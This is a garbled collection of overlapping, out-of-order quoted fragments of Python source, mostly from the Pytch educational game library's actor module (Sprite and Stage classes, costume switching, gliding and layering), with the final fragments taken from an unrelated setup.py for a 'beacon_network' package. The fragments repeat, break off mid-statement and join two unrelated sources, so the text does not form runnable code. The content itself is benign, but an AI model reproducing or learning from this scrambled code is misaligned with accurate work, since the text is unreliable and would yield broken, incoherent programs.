self._appearance_names.index(appearance_name) elif isinstance(appearance_name_or_index,", "be exactly at the target, and we want # the first frame to", "# 'complement' x = t * destination_x + t_c * start_x y =", "next_appearance(self, n_steps): if not isinstance(n_steps, int): raise ValueError(\"n_steps must be integer\") if len(self._Appearances)", "not destination_is_number: raise ValueError(\"destination coordinates must be numbers\") if not _is_number(seconds): raise ValueError(\"'seconds'", "len(self._Appearances) @property def appearance_number(self): return self._appearance_index @property def appearance_name(self): self.ensure_have_appearance_names() return self._appearance_names[self._appearance_index] class", "to have no Costumes, as # long as the Sprite always remains hidden.", "__init__(self): self._x = 0 self._y = 0 self._size = 1.0 self._speech = None", "True) @classmethod def ensure_have_appearance_names(cls): if cls._appearance_names is None: cls._appearance_names = [ appearance.label for", "be negative\") n_frames = max(int(seconds * FRAMES_PER_SECOND), 1) start_x = self._x start_y =", "a number\"); if seconds < 0: raise ValueError(\"'seconds' cannot be negative\") n_frames =", "{0}s') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__, n_appearances)) self._appearance_index = appearance_index else: raise ValueError( ('could not", "cls._appearance_names is None: cls._appearance_names = [ appearance.label for appearance in cls._Appearances ] def", "class \"{}\":' ' number can not be 
negative') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__)) n_appearances =", "y) wait_seconds(0) # No auto-yield (we don't do \"import pytch\") def set_size(self, size):", "or isinstance(x, float) class Actor: Sounds = [] _appearance_names = None def start_sound(self,", "* destination_x + t_c * start_x y = t * destination_y + t_c", "from 1 up # to n_frames (inclusive) rather than 0 up to n_frames", "one Backdrop. raise ValueError('no Backdrops in Stage') self._appearance_index = 0 @classmethod def the_only(cls):", "- 1. for frame_idx in range(1, n_frames + 1): t = frame_idx /", "switch {} in class \"{}\":' ' argument must be string or integer') .format(self._appearance_hyponym,", "self.say(content) wait_seconds(seconds) self.say_nothing() class Stage(Actor): Backdrops = [('solid-white', 'solid-white-stage.png')] _x = 0 _y", "raise ValueError(\"n_steps must be integer\") if len(self._Appearances) == 0: raise ValueError( ('could not", "pytch.project import FRAMES_PER_SECOND def _is_number(x): return isinstance(x, int) or isinstance(x, float) class Actor:", "appearance_index < 0: raise ValueError( ('could not switch to {} number {} in", "@property def appearance_number(self): return self._appearance_index @property def appearance_name(self): self.ensure_have_appearance_names() return self._appearance_names[self._appearance_index] class Sprite(Actor):", "next {} in class \"{}\":' ' it has no {0}s') .format(self._appearance_hyponym, self.__class__.__name__) )", "if not self.Costumes: # See comment in __init__(). raise RuntimeError('cannot show a Sprite", "def move_to_front_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", -1)) def move_to_back_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", 0)) def", "def move_forward_layers(self, n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\", n_layers)) def move_backward_layers(self, n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\",", "backdrop_name): self.switch_appearance(backdrop_name) def next_backdrop(self, n_steps=1): self.next_appearance(n_steps) @property def backdrop_number(self): return self.appearance_number @property def", "@classmethod def ensure_have_appearance_names(cls): if cls._appearance_names is None: cls._appearance_names = [ appearance.label for appearance", "= self._y # On completion, we must be exactly at the target, and", "def switch_appearance(self, appearance_name_or_index): self.ensure_have_appearance_names() if isinstance(appearance_name_or_index, str): appearance_name = appearance_name_or_index if appearance_name not", "None: cls._appearance_names = [ appearance.label for appearance in cls._Appearances ] def switch_appearance(self, appearance_name_or_index):", "[ ('question-mark', 'question-mark.png', 16, 16), ] _appearance_hyponym = 'Costume' def __init__(self): self._x =", "%= len(self._Appearances) @property def appearance_number(self): return self._appearance_index @property def appearance_name(self): self.ensure_have_appearance_names() return self._appearance_names[self._appearance_index]", "Stage is always shown and so # must have at least one Backdrop.", "<gh_stars>0 from pytch.syscalls import ( play_sound, registered_instances, wait_seconds, ) from pytch.project import FRAMES_PER_SECOND", "' it has no {0}s') .format(self._appearance_hyponym, self.__class__.__name__) ) self._appearance_index += n_steps self._appearance_index %=", "# 
to n_frames (inclusive) rather than 0 up to n_frames - 1. for", "raise RuntimeError('cannot show a Sprite with no Costumes') self._shown = True def hide(self):", "not switch to {} number {} in class \"{}\":' ' number can not", "pytch\") def set_size(self, size): self._size = size def show(self): if not self.Costumes: #", "# long as the Sprite always remains hidden. It might, for # example,", "content): self._speech = (\"say\", content) def say_nothing(self): self._speech = None def say_for_seconds(self, content,", "registered_instances(cls)[0] @classmethod def all_clones(cls): return registered_instances(cls)[1:] @classmethod def all_instances(cls): return registered_instances(cls) def go_to_xy(self,", "glide_to_xy(self, destination_x, destination_y, seconds): destination_is_number = ( _is_number(destination_x) and _is_number(destination_y) ) if not", "must be exactly at the target, and we want # the first frame", "start_y self.go_to_xy(x, y) wait_seconds(0) # No auto-yield (we don't do \"import pytch\") def", "See comment in __init__(). raise RuntimeError('cannot show a Sprite with no Costumes') self._shown", "t is in (0.0, 1.0] t_c = 1.0 - t # 'complement' x", "1. for frame_idx in range(1, n_frames + 1): t = frame_idx / n_frames", "to Sprites, a Stage is always shown and so # must have at", "y def get_x(self): return self._x def set_x(self, x): self._x = x def change_x(self,", "long as the Sprite always remains hidden. It might, for # example, only", "we must be exactly at the target, and we want # the first", "\"{}\":' ' it has no {0}s') .format(self._appearance_hyponym, self.__class__.__name__) ) self._appearance_index += n_steps self._appearance_index", "y): self._y = y def change_y(self, dy): self._y += dy def glide_to_xy(self, destination_x,", "self._y def set_y(self, y): self._y = y def change_y(self, dy): self._y += dy", "target_class)) def delete_this_clone(self): self._pytch_parent_project.unregister_actor_instance(self) def move_to_front_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", -1)) def move_to_back_layer(self): (self._pytch_parent_project", "numbers\") if not _is_number(seconds): raise ValueError(\"'seconds' must be a number\"); if seconds <", "= ( _is_number(destination_x) and _is_number(destination_y) ) if not destination_is_number: raise ValueError(\"destination coordinates must", "return self.appearance_name def touching(self, target_class): return (self._pytch_parent_project .instance_is_touching_any_of(self, target_class)) def delete_this_clone(self): self._pytch_parent_project.unregister_actor_instance(self) def", "= 1.0 _shown = True _speech = None _appearance_hyponym = 'Backdrop' def __init__(self):", "\"{}\"' .format(self._appearance_hyponym, appearance_name, self.__class__.__name__)) self._appearance_index = self._appearance_names.index(appearance_name) elif isinstance(appearance_name_or_index, int): appearance_index = appearance_name_or_index", "error to have no Costumes, as # long as the Sprite always remains", "= True _speech = None _appearance_hyponym = 'Backdrop' def __init__(self): if not self.Backdrops:", "= size def show(self): if not self.Costumes: # See comment in __init__(). raise", "at least one Backdrop. 
raise ValueError('no Backdrops in Stage') self._appearance_index = 0 @classmethod", "n_steps=1): self.next_appearance(n_steps) @property def costume_number(self): return self.appearance_number @property def costume_name(self): return self.appearance_name def", "say_for_seconds(self, content, seconds): self.say(content) wait_seconds(seconds) self.say_nothing() class Stage(Actor): Backdrops = [('solid-white', 'solid-white-stage.png')] _x", "' it only has {} {0}s') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__, n_appearances)) self._appearance_index = appearance_index", "_speech = None _appearance_hyponym = 'Backdrop' def __init__(self): if not self.Backdrops: # In", "if self.start_shown and not at_least_one_Costume: raise ValueError(\"start_shown is set,\" \" but there are", "if at_least_one_Costume: self._appearance_index = 0 else: # It is not necessarily an error", "t_c = 1.0 - t # 'complement' x = t * destination_x +", "move_backward_layers(self, n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\", -n_layers)) def say(self, content): self._speech = (\"say\", content)", "return registered_instances(cls) def go_to_xy(self, x, y): self._x = x self._y = y def", "1.0] t_c = 1.0 - t # 'complement' x = t * destination_x", "= at_least_one_Costume if at_least_one_Costume: self._appearance_index = 0 else: # It is not necessarily", "frame to involve some movement, so count from 1 up # to n_frames", "appearance_name_or_index): self.ensure_have_appearance_names() if isinstance(appearance_name_or_index, str): appearance_name = appearance_name_or_index if appearance_name not in self._appearance_names:", "t = frame_idx / n_frames # t is in (0.0, 1.0] t_c =", "self._appearance_index = self._appearance_names.index(appearance_name) elif isinstance(appearance_name_or_index, int): appearance_index = appearance_name_or_index if appearance_index < 0:", "raise ValueError(\"'seconds' must be a number\"); if seconds < 0: raise ValueError(\"'seconds' cannot", "if cls._appearance_names is None: cls._appearance_names = [ appearance.label for appearance in cls._Appearances ]", "= 0 else: # It is not necessarily an error to have no", "only has {} {0}s') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__, n_appearances)) self._appearance_index = appearance_index else: raise", "if appearance_index < 0: raise ValueError( ('could not switch to {} number {}", "raise ValueError(\"destination coordinates must be numbers\") if not _is_number(seconds): raise ValueError(\"'seconds' must be", "= max(int(seconds * FRAMES_PER_SECOND), 1) start_x = self._x start_y = self._y # On", "+= n_steps self._appearance_index %= len(self._Appearances) @property def appearance_number(self): return self._appearance_index @property def appearance_name(self):", "def delete_this_clone(self): self._pytch_parent_project.unregister_actor_instance(self) def move_to_front_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", -1)) def move_to_back_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self,", "\" but there are no Costumes\") self._shown = self.start_shown else: self._shown = at_least_one_Costume", "self._appearance_index @property def appearance_name(self): self.ensure_have_appearance_names() return self._appearance_names[self._appearance_index] class Sprite(Actor): Costumes = [ ('question-mark',", "be numbers\") if not _is_number(seconds): raise ValueError(\"'seconds' must be a number\"); if 
seconds", "target_class): return (self._pytch_parent_project .instance_is_touching_any_of(self, target_class)) def delete_this_clone(self): self._pytch_parent_project.unregister_actor_instance(self) def move_to_front_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\",", "# In contrast to Sprites, a Stage is always shown and so #", "switch to {} number {} in class \"{}\":' ' number can not be", "0 else: # It is not necessarily an error to have no Costumes,", "number {} in class \"{}\":' ' number can not be negative') .format(self._appearance_hyponym, appearance_index,", "y def change_y(self, dy): self._y += dy def glide_to_xy(self, destination_x, destination_y, seconds): destination_is_number", "\"relative\", n_layers)) def move_backward_layers(self, n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\", -n_layers)) def say(self, content): self._speech", "switch_backdrop(self, backdrop_name): self.switch_appearance(backdrop_name) def next_backdrop(self, n_steps=1): self.next_appearance(n_steps) @property def backdrop_number(self): return self.appearance_number @property", "def touching(self, target_class): return (self._pytch_parent_project .instance_is_touching_any_of(self, target_class)) def delete_this_clone(self): self._pytch_parent_project.unregister_actor_instance(self) def move_to_front_layer(self): (self._pytch_parent_project", "have at least one Backdrop. raise ValueError('no Backdrops in Stage') self._appearance_index = 0", "== 0: raise ValueError( ('could not move to next {} in class \"{}\":'", "is set,\" \" but there are no Costumes\") self._shown = self.start_shown else: self._shown", "@classmethod def all_clones(cls): return registered_instances(cls)[1:] @classmethod def all_instances(cls): return registered_instances(cls) def go_to_xy(self, x,", "range(1, n_frames + 1): t = frame_idx / n_frames # t is in", "n_frames (inclusive) rather than 0 up to n_frames - 1. for frame_idx in", "not be negative') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__)) n_appearances = len(self._appearance_names) if appearance_index >= n_appearances:", "n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\", -n_layers)) def say(self, content): self._speech = (\"say\", content) def", "completion, we must be exactly at the target, and we want # the", "self.start_shown and not at_least_one_Costume: raise ValueError(\"start_shown is set,\" \" but there are no", "string or integer') .format(self._appearance_hyponym, self.__class__.__name__)) def next_appearance(self, n_steps): if not isinstance(n_steps, int): raise", "self.__class__.__name__)) n_appearances = len(self._appearance_names) if appearance_index >= n_appearances: raise ValueError( ('could not switch", "x self._y = y def get_x(self): return self._x def set_x(self, x): self._x =", "n_appearances = len(self._appearance_names) if appearance_index >= n_appearances: raise ValueError( ('could not switch to", "start_x y = t * destination_y + t_c * start_y self.go_to_xy(x, y) wait_seconds(0)", "@property def costume_name(self): return self.appearance_name def touching(self, target_class): return (self._pytch_parent_project .instance_is_touching_any_of(self, target_class)) def", "It might, for # example, only receive/broadcast messages or play sounds. 
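# Hedged usage sketch (illustrative only, not part of this module): how the
# appearance machinery above dispatches on name vs. index.  The subclass,
# its appearance list, and the "label" stand-in below are hypothetical; in
# a real project, _Appearances is populated by the asset loader.
#
#     from collections import namedtuple
#     _FakeAppearance = namedtuple("_FakeAppearance", ["label"])
#
#     class _DemoActor(Actor):
#         _appearance_hyponym = "Costume"
#         _Appearances = [_FakeAppearance("red"), _FakeAppearance("blue")]
#
#     demo = _DemoActor()
#     demo._appearance_index = 0
#     demo.switch_appearance("blue")  # by name  -> index 1
#     demo.switch_appearance(0)       # by index -> "red"
#     demo.next_appearance(3)         # wraps: (0 + 3) % 2 == 1 -> "blue"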
class Sprite(Actor):
    Costumes = [
        ('question-mark', 'question-mark.png', 16, 16),
    ]

    _appearance_hyponym = 'Costume'

    def __init__(self):
        self._x = 0
        self._y = 0
        self._size = 1.0
        self._speech = None

        at_least_one_Costume = len(self._Appearances) != 0
        if hasattr(self, "start_shown"):
            if self.start_shown and not at_least_one_Costume:
                raise ValueError("start_shown is set,"
                                 " but there are no Costumes")
            self._shown = self.start_shown
        else:
            self._shown = at_least_one_Costume

        if at_least_one_Costume:
            self._appearance_index = 0
        else:
            # It is not necessarily an error to have no Costumes, as
            # long as the Sprite always remains hidden.  It might, for
            # example, only receive/broadcast messages or play sounds.
            self._appearance_index = None

    @classmethod
    def the_original(cls):
        return registered_instances(cls)[0]

    @classmethod
    def all_clones(cls):
        return registered_instances(cls)[1:]

    @classmethod
    def all_instances(cls):
        return registered_instances(cls)

    def go_to_xy(self, x, y):
        self._x = x
        self._y = y

    def get_x(self):
        return self._x

    def set_x(self, x):
        self._x = x

    def change_x(self, dx):
        self._x += dx

    def get_y(self):
        return self._y

    def set_y(self, y):
        self._y = y

    def change_y(self, dy):
        self._y += dy

    def glide_to_xy(self, destination_x, destination_y, seconds):
        destination_is_number = (
            _is_number(destination_x) and _is_number(destination_y)
        )
        if not destination_is_number:
            raise ValueError("destination coordinates must be numbers")
        if not _is_number(seconds):
            raise ValueError("'seconds' must be a number")
        if seconds < 0:
            raise ValueError("'seconds' cannot be negative")

        n_frames = max(int(seconds * FRAMES_PER_SECOND), 1)
        start_x = self._x
        start_y = self._y

        # On completion, we must be exactly at the target, and we want
        # the first frame to involve some movement, so count from 1 up
        # to n_frames (inclusive) rather than 0 up to n_frames - 1.
        for frame_idx in range(1, n_frames + 1):
            t = frame_idx / n_frames  # t is in (0.0, 1.0]
            t_c = 1.0 - t  # 'complement'
            x = t * destination_x + t_c * start_x
            y = t * destination_y + t_c * start_y
            self.go_to_xy(x, y)
            wait_seconds(0)  # No auto-yield (we don't do "import pytch")
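    # Worked example of the interpolation above (comment only, not
    # executed): gliding from x=0 to x=100 over 4 frames evaluates
    #     x = t * 100 + (1 - t) * 0   for t = 1/4, 2/4, 3/4, 4/4
    # so the sprite visits x = 25, 50, 75 and lands exactly on 100,
    # because the loop runs t up to exactly 1.0.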
    def set_size(self, size):
        self._size = size

    def show(self):
        if not self.Costumes:
            # See comment in __init__().
            raise RuntimeError('cannot show a Sprite with no Costumes')
        self._shown = True

    def hide(self):
        self._shown = False

    def switch_costume(self, costume_name):
        self.switch_appearance(costume_name)

    def next_costume(self, n_steps=1):
        self.next_appearance(n_steps)

    @property
    def costume_number(self):
        return self.appearance_number

    @property
    def costume_name(self):
        return self.appearance_name

    def touching(self, target_class):
        return (self._pytch_parent_project
                .instance_is_touching_any_of(self, target_class))

    def delete_this_clone(self):
        self._pytch_parent_project.unregister_actor_instance(self)

    def move_to_front_layer(self):
        (self._pytch_parent_project
         .move_within_draw_layer_group(self, "absolute", -1))

    def move_to_back_layer(self):
        (self._pytch_parent_project
         .move_within_draw_layer_group(self, "absolute", 0))

    def move_forward_layers(self, n_layers):
        (self._pytch_parent_project
         .move_within_draw_layer_group(self, "relative", n_layers))

    def move_backward_layers(self, n_layers):
        (self._pytch_parent_project
         .move_within_draw_layer_group(self, "relative", -n_layers))

    def say(self, content):
        self._speech = ("say", content)

    def say_nothing(self):
        self._speech = None

    def say_for_seconds(self, content, seconds):
        self.say(content)
        wait_seconds(seconds)
        self.say_nothing()
self._appearance_index = None @classmethod def the_original(cls):", "def set_size(self, size): self._size = size def show(self): if not self.Costumes: # See", "exactly at the target, and we want # the first frame to involve", "return self._appearance_names[self._appearance_index] class Sprite(Actor): Costumes = [ ('question-mark', 'question-mark.png', 16, 16), ] _appearance_hyponym", "self._appearance_names.index(appearance_name) elif isinstance(appearance_name_or_index, int): appearance_index = appearance_name_or_index if appearance_index < 0: raise ValueError(", "a Sprite with no Costumes') self._shown = True def hide(self): self._shown = False", "wait_seconds(0) # No auto-yield (we don't do \"import pytch\") def set_size(self, size): self._size", "def glide_to_xy(self, destination_x, destination_y, seconds): destination_is_number = ( _is_number(destination_x) and _is_number(destination_y) ) if", "\"start_shown\"): if self.start_shown and not at_least_one_Costume: raise ValueError(\"start_shown is set,\" \" but there", "messages or play sounds. self._appearance_index = None @classmethod def the_original(cls): return registered_instances(cls)[0] @classmethod", "ValueError( ('could not switch to {} number {} in class \"{}\":' ' it", "self.ensure_have_appearance_names() if isinstance(appearance_name_or_index, str): appearance_name = appearance_name_or_index if appearance_name not in self._appearance_names: raise", "t_c * start_y self.go_to_xy(x, y) wait_seconds(0) # No auto-yield (we don't do \"import", "__init__(). raise RuntimeError('cannot show a Sprite with no Costumes') self._shown = True def", "n_frames - 1. for frame_idx in range(1, n_frames + 1): t = frame_idx", "= 1.0 self._speech = None at_least_one_Costume = len(self._Appearances) != 0 if hasattr(self, \"start_shown\"):", "str): appearance_name = appearance_name_or_index if appearance_name not in self._appearance_names: raise KeyError('could not find", "= [ appearance.label for appearance in cls._Appearances ] def switch_appearance(self, appearance_name_or_index): self.ensure_have_appearance_names() if", "1.0 _shown = True _speech = None _appearance_hyponym = 'Backdrop' def __init__(self): if", "{} in class \"{}\":' ' it only has {} {0}s') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__,", "destination_is_number = ( _is_number(destination_x) and _is_number(destination_y) ) if not destination_is_number: raise ValueError(\"destination coordinates", "self._appearance_names: raise KeyError('could not find {} \"{}\" in class \"{}\"' .format(self._appearance_hyponym, appearance_name, self.__class__.__name__))", "shown and so # must have at least one Backdrop. 
raise ValueError('no Backdrops", "for appearance in cls._Appearances ] def switch_appearance(self, appearance_name_or_index): self.ensure_have_appearance_names() if isinstance(appearance_name_or_index, str): appearance_name", "= None def start_sound(self, sound_name): play_sound(self, sound_name, False) def play_sound_until_done(self, sound_name): play_sound(self, sound_name,", ".move_within_draw_layer_group(self, \"absolute\", 0)) def move_forward_layers(self, n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\", n_layers)) def move_backward_layers(self, n_layers):", "else: self._shown = at_least_one_Costume if at_least_one_Costume: self._appearance_index = 0 else: # It is", "self._size = 1.0 self._speech = None at_least_one_Costume = len(self._Appearances) != 0 if hasattr(self,", "integer\") if len(self._Appearances) == 0: raise ValueError( ('could not move to next {}", "_x = 0 _y = 0 _size = 1.0 _shown = True _speech", "the target, and we want # the first frame to involve some movement,", "self._shown = False def switch_costume(self, costume_name): self.switch_appearance(costume_name) def next_costume(self, n_steps=1): self.next_appearance(n_steps) @property def", "isinstance(x, float) class Actor: Sounds = [] _appearance_names = None def start_sound(self, sound_name):", "ValueError(\"destination coordinates must be numbers\") if not _is_number(seconds): raise ValueError(\"'seconds' must be a", "self.switch_appearance(costume_name) def next_costume(self, n_steps=1): self.next_appearance(n_steps) @property def costume_number(self): return self.appearance_number @property def costume_name(self):", "= None def say_for_seconds(self, content, seconds): self.say(content) wait_seconds(seconds) self.say_nothing() class Stage(Actor): Backdrops =", "is None: cls._appearance_names = [ appearance.label for appearance in cls._Appearances ] def switch_appearance(self,", "self._pytch_parent_project.unregister_actor_instance(self) def move_to_front_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", -1)) def move_to_back_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", 0))" ]
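In use, a project defines Sprite subclasses and lets the runtime drive them through event handlers. The sketch below is a minimal, hypothetical usage example, assuming it runs inside the Pytch environment: the Banana class, its costume files, and the target coordinates are illustrative assumptions, not part of the module above.

# A minimal usage sketch, assuming the Pytch runtime registers this
# Sprite subclass and dispatches the green-flag event to it.
import pytch


class Banana(pytch.Sprite):
    Costumes = [
        ('yellow', 'banana-yellow.png', 50, 30),  # hypothetical assets
        ('brown', 'banana-brown.png', 50, 30),
    ]

    @pytch.when_green_flag_clicked
    def wander(self):
        self.switch_costume('yellow')    # select a Costume by name ...
        self.show()
        self.glide_to_xy(100, 50, 2.0)   # ~2s of linear interpolation
        self.next_costume()              # ... or step to the next one
        self.say_for_seconds('hello', 1.0)
        self.hide()

Note that glide_to_xy blocks the calling script for roughly seconds' worth of frames, interpolating linearly between the start and destination positions, so it pairs naturally with a one-shot handler like this.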
[ "Apache Software License\", \"Programming Language :: Python :: 3.8\", ], packages=[ \"aggregator\", \"aggregator/config\",", "classifiers=[ \"Development Status :: 3 - Beta\", \"Intended Audience :: Developers\", \"Topic ::", "\"registry/schemas\", \"registry/utils\", ], package_data={\"\": [\"*.json\", \"*.ini\"]}, install_requires=[ \"asyncio==3.4.3\", \"aiohttp==3.8.1\", \"aiohttp-cors==0.7.0\", \"aiocache==0.11.1\", \"aiomcache==0.6.0\", \"ujson==4.3.0\",", "author=\"CSC - IT Center for Science\", classifiers=[ \"Development Status :: 3 - Beta\",", "\"aiomcache==0.6.0\", \"ujson==4.3.0\", \"uvloop==0.14.0; python_version < '3.7'\", \"uvloop==0.16.0; python_version >= '3.7'\", \"asyncpg==0.25.0\", \"jsonschema==4.2.1\", \"gunicorn==20.1.0\",", "\"Source\": \"https://github.com/CSCfi/beacon-network\", }, author=\"CSC - IT Center for Science\", classifiers=[ \"Development Status ::", "\"Topic :: Internet :: WWW/HTTP :: HTTP Servers\", \"License :: OSI Approved ::", "\"registry/endpoints\", \"registry/schemas\", \"registry/utils\", ], package_data={\"\": [\"*.json\", \"*.ini\"]}, install_requires=[ \"asyncio==3.4.3\", \"aiohttp==3.8.1\", \"aiohttp-cors==0.7.0\", \"aiocache==0.11.1\", \"aiomcache==0.6.0\",", "python_version < '3.7'\", \"uvloop==0.16.0; python_version >= '3.7'\", \"asyncpg==0.25.0\", \"jsonschema==4.2.1\", \"gunicorn==20.1.0\", ], extras_require={ \"test\":", "\"tox==3.24.4\", \"flake8==4.0.1\", \"flake8-docstrings==1.6.0\", \"asynctest==0.13.0\", \"aioresponses==0.7.2\", \"black==21.12b0\", ], \"docs\": [\"sphinx >= 1.4\", \"sphinx_rtd_theme==1.0.0\"], },", "WWW/HTTP :: HTTP Servers\", \"License :: OSI Approved :: Apache Software License\", \"Programming", ":: WWW/HTTP :: HTTP Servers\", \"License :: OSI Approved :: Apache Software License\",", "\"uvloop==0.14.0; python_version < '3.7'\", \"uvloop==0.16.0; python_version >= '3.7'\", \"asyncpg==0.25.0\", \"jsonschema==4.2.1\", \"gunicorn==20.1.0\", ], extras_require={", "import setup setup( name=\"beacon_network\", version=\"1.4.0\", description=\"Beacon Network services\", long_description_content_type=\"text/markdown\", project_urls={ \"Source\": \"https://github.com/CSCfi/beacon-network\", },", "<reponame>CSCfi/beacon-network<gh_stars>1-10 from setuptools import setup setup( name=\"beacon_network\", version=\"1.4.0\", description=\"Beacon Network services\", long_description_content_type=\"text/markdown\", project_urls={", "\"pytest-cov==3.0.0\", \"testfixtures==6.18.3\", \"tox==3.24.4\", \"flake8==4.0.1\", \"flake8-docstrings==1.6.0\", \"asynctest==0.13.0\", \"aioresponses==0.7.2\", \"black==21.12b0\", ], \"docs\": [\"sphinx >= 1.4\",", "\"aiohttp==3.8.1\", \"aiohttp-cors==0.7.0\", \"aiocache==0.11.1\", \"aiomcache==0.6.0\", \"ujson==4.3.0\", \"uvloop==0.14.0; python_version < '3.7'\", \"uvloop==0.16.0; python_version >= '3.7'\",", "Language :: Python :: 3.8\", ], packages=[ \"aggregator\", \"aggregator/config\", \"aggregator/endpoints\", \"aggregator/utils\", \"registry\", \"registry/config\",", ">= '3.7'\", \"asyncpg==0.25.0\", \"jsonschema==4.2.1\", \"gunicorn==20.1.0\", ], extras_require={ \"test\": [ \"coverage==6.2\", \"pytest<6.3\", \"pytest-cov==3.0.0\", \"testfixtures==6.18.3\",", ":: HTTP Servers\", \"License :: OSI Approved :: Apache Software License\", \"Programming Language", "setup( name=\"beacon_network\", version=\"1.4.0\", description=\"Beacon Network services\", long_description_content_type=\"text/markdown\", project_urls={ \"Source\": \"https://github.com/CSCfi/beacon-network\", }, author=\"CSC -", 
"\"aggregator/config\", \"aggregator/endpoints\", \"aggregator/utils\", \"registry\", \"registry/config\", \"registry/endpoints\", \"registry/schemas\", \"registry/utils\", ], package_data={\"\": [\"*.json\", \"*.ini\"]}, install_requires=[", "from setuptools import setup setup( name=\"beacon_network\", version=\"1.4.0\", description=\"Beacon Network services\", long_description_content_type=\"text/markdown\", project_urls={ \"Source\":", "\"registry/config\", \"registry/endpoints\", \"registry/schemas\", \"registry/utils\", ], package_data={\"\": [\"*.json\", \"*.ini\"]}, install_requires=[ \"asyncio==3.4.3\", \"aiohttp==3.8.1\", \"aiohttp-cors==0.7.0\", \"aiocache==0.11.1\",", "\"*.ini\"]}, install_requires=[ \"asyncio==3.4.3\", \"aiohttp==3.8.1\", \"aiohttp-cors==0.7.0\", \"aiocache==0.11.1\", \"aiomcache==0.6.0\", \"ujson==4.3.0\", \"uvloop==0.14.0; python_version < '3.7'\", \"uvloop==0.16.0;", "\"registry/utils\", ], package_data={\"\": [\"*.json\", \"*.ini\"]}, install_requires=[ \"asyncio==3.4.3\", \"aiohttp==3.8.1\", \"aiohttp-cors==0.7.0\", \"aiocache==0.11.1\", \"aiomcache==0.6.0\", \"ujson==4.3.0\", \"uvloop==0.14.0;", "\"aiocache==0.11.1\", \"aiomcache==0.6.0\", \"ujson==4.3.0\", \"uvloop==0.14.0; python_version < '3.7'\", \"uvloop==0.16.0; python_version >= '3.7'\", \"asyncpg==0.25.0\", \"jsonschema==4.2.1\",", "\"asyncio==3.4.3\", \"aiohttp==3.8.1\", \"aiohttp-cors==0.7.0\", \"aiocache==0.11.1\", \"aiomcache==0.6.0\", \"ujson==4.3.0\", \"uvloop==0.14.0; python_version < '3.7'\", \"uvloop==0.16.0; python_version >=", "3.8\", ], packages=[ \"aggregator\", \"aggregator/config\", \"aggregator/endpoints\", \"aggregator/utils\", \"registry\", \"registry/config\", \"registry/endpoints\", \"registry/schemas\", \"registry/utils\", ],", "\"aioresponses==0.7.2\", \"black==21.12b0\", ], \"docs\": [\"sphinx >= 1.4\", \"sphinx_rtd_theme==1.0.0\"], }, entry_points={ \"console_scripts\": [\"beacon_registry=registry.registry:main\", \"beacon_aggregator=aggregator.aggregator:main\"],", "Servers\", \"License :: OSI Approved :: Apache Software License\", \"Programming Language :: Python", "\"aggregator\", \"aggregator/config\", \"aggregator/endpoints\", \"aggregator/utils\", \"registry\", \"registry/config\", \"registry/endpoints\", \"registry/schemas\", \"registry/utils\", ], package_data={\"\": [\"*.json\", \"*.ini\"]},", "Developers\", \"Topic :: Internet :: WWW/HTTP :: HTTP Servers\", \"License :: OSI Approved", ":: Apache Software License\", \"Programming Language :: Python :: 3.8\", ], packages=[ \"aggregator\",", "< '3.7'\", \"uvloop==0.16.0; python_version >= '3.7'\", \"asyncpg==0.25.0\", \"jsonschema==4.2.1\", \"gunicorn==20.1.0\", ], extras_require={ \"test\": [", "extras_require={ \"test\": [ \"coverage==6.2\", \"pytest<6.3\", \"pytest-cov==3.0.0\", \"testfixtures==6.18.3\", \"tox==3.24.4\", \"flake8==4.0.1\", \"flake8-docstrings==1.6.0\", \"asynctest==0.13.0\", \"aioresponses==0.7.2\", \"black==21.12b0\",", "long_description_content_type=\"text/markdown\", project_urls={ \"Source\": \"https://github.com/CSCfi/beacon-network\", }, author=\"CSC - IT Center for Science\", classifiers=[ \"Development", "[\"*.json\", \"*.ini\"]}, install_requires=[ \"asyncio==3.4.3\", \"aiohttp==3.8.1\", \"aiohttp-cors==0.7.0\", \"aiocache==0.11.1\", \"aiomcache==0.6.0\", \"ujson==4.3.0\", \"uvloop==0.14.0; python_version < '3.7'\",", "Software License\", \"Programming Language :: Python :: 3.8\", ], packages=[ \"aggregator\", \"aggregator/config\", \"aggregator/endpoints\",", ":: 3 - Beta\", \"Intended 
Audience :: Developers\", \"Topic :: Internet :: WWW/HTTP", ":: Python :: 3.8\", ], packages=[ \"aggregator\", \"aggregator/config\", \"aggregator/endpoints\", \"aggregator/utils\", \"registry\", \"registry/config\", \"registry/endpoints\",", "services\", long_description_content_type=\"text/markdown\", project_urls={ \"Source\": \"https://github.com/CSCfi/beacon-network\", }, author=\"CSC - IT Center for Science\", classifiers=[", "Internet :: WWW/HTTP :: HTTP Servers\", \"License :: OSI Approved :: Apache Software", "\"aiohttp-cors==0.7.0\", \"aiocache==0.11.1\", \"aiomcache==0.6.0\", \"ujson==4.3.0\", \"uvloop==0.14.0; python_version < '3.7'\", \"uvloop==0.16.0; python_version >= '3.7'\", \"asyncpg==0.25.0\",", "Audience :: Developers\", \"Topic :: Internet :: WWW/HTTP :: HTTP Servers\", \"License ::", "\"ujson==4.3.0\", \"uvloop==0.14.0; python_version < '3.7'\", \"uvloop==0.16.0; python_version >= '3.7'\", \"asyncpg==0.25.0\", \"jsonschema==4.2.1\", \"gunicorn==20.1.0\", ],", "HTTP Servers\", \"License :: OSI Approved :: Apache Software License\", \"Programming Language ::", "\"registry\", \"registry/config\", \"registry/endpoints\", \"registry/schemas\", \"registry/utils\", ], package_data={\"\": 